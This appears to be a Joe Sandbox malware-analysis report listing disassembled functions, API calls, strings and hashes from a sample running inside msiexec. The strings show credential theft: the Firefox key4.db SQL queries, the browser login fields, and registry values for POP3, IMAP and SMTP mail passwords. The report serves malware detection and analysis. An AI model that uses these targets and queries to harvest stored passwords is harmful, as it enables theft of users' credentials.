                                                                                        • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                        • API String ID: 3137614212-1455797042
                                                                                        • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                        • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                        • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                        • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                        Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                          • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                          • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                          • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                        • memset.MSVCRT ref: 0040E5B8
                                                                                        • memset.MSVCRT ref: 0040E5CD
                                                                                        • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                        • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                        • memset.MSVCRT ref: 0040E6B5
                                                                                        • memset.MSVCRT ref: 0040E6CC
                                                                                          • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                          • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                        • memset.MSVCRT ref: 0040E736
                                                                                        • memset.MSVCRT ref: 0040E74F
                                                                                        • sprintf.MSVCRT ref: 0040E76D
                                                                                        • sprintf.MSVCRT ref: 0040E788
                                                                                        • _strcmpi.MSVCRT ref: 0040E79E
                                                                                        • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                        • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                        • memset.MSVCRT ref: 0040E858
                                                                                        • sprintf.MSVCRT ref: 0040E873
                                                                                        • _strcmpi.MSVCRT ref: 0040E889
                                                                                        • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                        • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                        • API String ID: 4171719235-3943159138
                                                                                        • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                        • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                        • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                        • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                        Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                        • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                        • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                        • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                        • GetDC.USER32 ref: 004104E2
                                                                                        • strlen.MSVCRT ref: 00410522
                                                                                        • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                        • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                        • sprintf.MSVCRT ref: 00410640
                                                                                        • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                        • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                        • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                        • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                        • GetClientRect.USER32(?,?), ref: 00410737
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                        • String ID: %s:$EDIT$STATIC
                                                                                        • API String ID: 1703216249-3046471546
                                                                                        • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                        • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                        • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                        • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                        Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004024F5
                                                                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                        • _mbscpy.MSVCRT(?,00000000,?,?,?,68127B60,?,00000000), ref: 00402533
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscpy$QueryValuememset
                                                                                        • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                        • API String ID: 168965057-606283353
                                                                                        • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                        • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                        • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                        • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                        Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00402869
                                                                                          • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                        • _mbscpy.MSVCRT(?,?,68127B60,?,00000000), ref: 004028A3
                                                                                          • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,68127B60,?,00000000), ref: 0040297B
                                                                                          • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                        • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                        • API String ID: 1497257669-167382505
                                                                                        • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                        • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                        • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                        • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                        Function 0040FC40 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                        • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                        • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                        • memset.MSVCRT ref: 0040FCFD
                                                                                        • memset.MSVCRT ref: 0040FD1D
                                                                                        • memset.MSVCRT ref: 0040FD3B
                                                                                        • memset.MSVCRT ref: 0040FD54
                                                                                        • memset.MSVCRT ref: 0040FD72
                                                                                        • memset.MSVCRT ref: 0040FD8B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                        • memset.MSVCRT ref: 0040FE45
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                        • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                        • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                        • sprintf.MSVCRT ref: 0040FF0F
                                                                                        • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                        • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                        Strings
                                                                                        • {Unknown}, xrefs: 0040FD02
                                                                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                        • API String ID: 1428123949-3474136107
                                                                                        • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                        • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                        • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                        • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                        Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                        • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                        • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                        • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                        • DeleteObject.GDI32(?), ref: 00401226
                                                                                        • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                        • ShowWindow.USER32(00000000), ref: 00401253
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                        • ShowWindow.USER32(00000000), ref: 00401262
                                                                                        • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                        • memset.MSVCRT ref: 0040128E
                                                                                        • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                        • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                        • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                        • String ID:
                                                                                        • API String ID: 2998058495-0
                                                                                        • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                        • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                        • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                        • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                        Function 0040BBF0 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                          • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                        • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                        • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                        • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                        • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                        • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                        • _strcmpi.MSVCRT ref: 0040BE93
                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                        • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                                                        • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                        • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                        • strlen.MSVCRT ref: 0040BEFE
                                                                                        • strlen.MSVCRT ref: 0040BF0C
                                                                                        • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                          • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                          • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                        • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                        • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                        • memset.MSVCRT ref: 0040BFDB
                                                                                        • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                        • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                        • API String ID: 2303586283-933021314
                                                                                        • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                        • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                        • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                        • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                        Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                        • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                        • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                        • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                        • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                        • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmp$memcpy
                                                                                        • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                        • API String ID: 231171946-2189169393
                                                                                        • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                        • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                        • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                        • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                        Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                        • API String ID: 633282248-1996832678
                                                                                        • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                        • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                        • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                        • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                        Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00406782
                                                                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                        • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                        • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                        • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                        • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                        • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                        • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                        • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                        • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                        • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                        • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                        Strings
                                                                                        • key4.db, xrefs: 00406756
                                                                                        • , xrefs: 00406834
                                                                                        • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                        • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memcmp$memsetstrlen
                                                                                        • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                        • API String ID: 3614188050-3983245814
                                                                                        • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                        • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                        • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                        • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                        Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040A973
                                                                                        • memset.MSVCRT ref: 0040A996
                                                                                        • memset.MSVCRT ref: 0040A9AC
                                                                                        • memset.MSVCRT ref: 0040A9BC
                                                                                        • sprintf.MSVCRT ref: 0040A9F0
                                                                                        • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                        • sprintf.MSVCRT ref: 0040AABE
                                                                                        • _mbscat.MSVCRT ref: 0040AAED
                                                                                          • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                        • sprintf.MSVCRT ref: 0040AB21
                                                                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                        • API String ID: 710961058-601624466
                                                                                        • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                        • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                        • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                        • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                        Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: sprintf$memset$_mbscpy
